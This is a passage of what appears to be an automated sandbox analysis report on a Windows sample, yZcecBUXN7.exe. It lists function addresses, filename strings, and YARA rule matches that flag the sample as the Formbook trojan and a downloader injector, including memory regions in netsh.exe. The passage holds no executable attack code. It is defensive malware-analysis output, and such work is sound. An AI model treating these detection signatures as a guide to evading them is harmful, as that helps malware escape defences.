            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA1181_2_011AA118
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011001001_2_01100100
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011981581_2_01198158
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D01AA1_2_011D01AA
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C41A21_2_011C41A2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C81CC1_2_011C81CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A20001_2_011A2000
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CA3521_2_011CA352
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E3F01_2_0111E3F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D03E61_2_011D03E6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B02741_2_011B0274
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011902C01_2_011902C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011105351_2_01110535
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D05911_2_011D0591
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B44201_2_011B4420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C24461_2_011C2446
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BE4F61_2_011BE4F6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011347501_2_01134750
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011107701_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110C7C01_2_0110C7C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112C6E01_2_0112C6E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011269621_2_01126962
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A01_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011DA9A61_2_011DA9A6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111A8401_2_0111A840
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011128401_2_01112840
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F68B81_2_010F68B8
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E8F01_2_0113E8F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CAB401_2_011CAB40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C6BD71_2_011C6BD7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA801_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011ACD1F1_2_011ACD1F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111AD001_2_0111AD00
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01128DBF1_2_01128DBF
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110ADE01_2_0110ADE0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110C001_2_01110C00
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0CB51_2_011B0CB5
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100CF21_2_01100CF2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130F301_2_01130F30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B2F301_2_011B2F30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01152F281_2_01152F28
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01184F401_2_01184F40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118EFA01_2_0118EFA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102FC81_2_01102FC8
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CEE261_2_011CEE26
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110E591_2_01110E59
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122E901_2_01122E90
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CCE931_2_011CCE93
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CEEDB1_2_011CEEDB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011DB16B1_2_011DB16B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114516C1_2_0114516C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FF1721_2_010FF172
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111B1B01_2_0111B1B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011170C01_2_011170C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BF0CC1_2_011BF0CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C70E91_2_011C70E9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CF0E01_2_011CF0E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C132D1_2_011C132D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FD34C1_2_010FD34C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0115739A1_2_0115739A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011152A01_2_011152A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112B2C01_2_0112B2C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112D2F01_2_0112D2F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B12ED1_2_011B12ED
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C75711_2_011C7571
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AD5B01_2_011AD5B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D95C31_2_011D95C3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CF43F1_2_011CF43F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011014601_2_01101460
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CF7B01_2_011CF7B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011556301_2_01155630
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C16CC1_2_011C16CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A59101_2_011A5910
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011199501_2_01119950
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112B9501_2_0112B950
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117D8001_2_0117D800
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011138E01_2_011138E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFB761_2_011CFB76
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112FB801_2_0112FB80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01185BF01_2_01185BF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114DBF91_2_0114DBF9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFA491_2_011CFA49
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C7A461_2_011C7A46
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01183A6C1_2_01183A6C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01155AA01_2_01155AA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011ADAAC1_2_011ADAAC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B1AA31_2_011B1AA3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BDAC61_2_011BDAC6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C1D5A1_2_011C1D5A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01113D401_2_01113D40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C7D731_2_011C7D73
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112FDC01_2_0112FDC0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01189C321_2_01189C32
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFCF21_2_011CFCF2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFF091_2_011CFF09
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01111F921_2_01111F92
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFFB11_2_011CFFB1
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D3FD51_2_010D3FD5
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D3FD21_2_010D3FD2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01119EB01_2_01119EB0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038403E64_2_038403E6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0378E3F04_2_0378E3F0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383A3524_2_0383A352
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038002C04_2_038002C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038202744_2_03820274
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038341A24_2_038341A2
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038401AA4_2_038401AA
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038381CC4_2_038381CC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037701004_2_03770100
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0381A1184_2_0381A118
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038081584_2_03808158
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038120004_2_03812000
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037807704_2_03780770
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037A47504_2_037A4750
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0377C7C04_2_0377C7C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379C6E04_2_0379C6E0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038405914_2_03840591
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037805354_2_03780535
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0382E4F64_2_0382E4F6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038244204_2_03824420
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038324464_2_03832446
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03836BD74_2_03836BD7
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383AB404_2_0383AB40
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0377EA804_2_0377EA80
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037969624_2_03796962
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0384A9A64_2_0384A9A6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037829A04_2_037829A0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0378A8404_2_0378A840
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037828404_2_03782840
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037AE8F04_2_037AE8F0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037668B84_2_037668B8
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F4F404_2_037F4F40
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037A0F304_2_037A0F30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C2F284_2_037C2F28
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03822F304_2_03822F30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03772FC84_2_03772FC8
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037FEFA04_2_037FEFA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383CE934_2_0383CE93
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03780E594_2_03780E59
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383EEDB4_2_0383EEDB
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383EE264_2_0383EE26
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03792E904_2_03792E90
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0378AD004_2_0378AD00
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0377ADE04_2_0377ADE0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0381CD1F4_2_0381CD1F
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03798DBF4_2_03798DBF
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03820CB54_2_03820CB5
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03780C004_2_03780C00
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03770CF24_2_03770CF2
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0376D34C4_2_0376D34C
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383132D4_2_0383132D
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C739A4_2_037C739A
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038212ED4_2_038212ED
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379D2F04_2_0379D2F0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379B2C04_2_0379B2C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037852A04_2_037852A0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0376F1724_2_0376F172
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B516C4_2_037B516C
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0378B1B04_2_0378B1B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0384B16B4_2_0384B16B
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0382F0CC4_2_0382F0CC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383F0E04_2_0383F0E0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038370E94_2_038370E9
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037870C04_2_037870C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383F7B04_2_0383F7B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C56304_2_037C5630
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038316CC4_2_038316CC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0381D5B04_2_0381D5B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038495C34_2_038495C3
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038375714_2_03837571
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037714604_2_03771460
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383F43F4_2_0383F43F
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037BDBF94_2_037BDBF9
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F5BF04_2_037F5BF0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FB764_2_0383FB76
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379FB804_2_0379FB80
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F3A6C4_2_037F3A6C
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03821AA34_2_03821AA3
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0381DAAC4_2_0381DAAC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0382DAC64_2_0382DAC6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03837A464_2_03837A46
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FA494_2_0383FA49
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C5AA04_2_037C5AA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037899504_2_03789950
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379B9504_2_0379B950
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038159104_2_03815910
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037ED8004_2_037ED800
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037838E04_2_037838E0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FFB14_2_0383FFB1
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FF094_2_0383FF09
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03781F924_2_03781F92
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03789EB04_2_03789EB0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03783D404_2_03783D40
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379FDC04_2_0379FDC0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03831D5A4_2_03831D5A
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03837D734_2_03837D73
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F9C324_2_037F9C32
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FCF24_2_0383FCF2
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C111D04_2_00C111D0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0C3904_2_00C0C390
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0C5B04_2_00C0C5B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0A62D4_2_00C0A62D
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0A6304_2_00C0A630
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C12D304_2_00C12D30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C29D704_2_00C29D70
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 01145130 appears 58 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 010FB970 appears 262 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 01157E54 appears 107 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 0117EA12 appears 86 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 0118F290 appears 103 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037C7E54 appears 107 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037FF290 appears 103 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0376B970 appears 262 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037B5130 appears 58 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037EEA12 appears 86 times
            Source: yZcecBUXN7.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: yZcecBUXN7.exe, 00000000.00000002.1626357622.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1626915170.0000000003A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000000.1623598827.00000000006D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000011FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exeBinary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
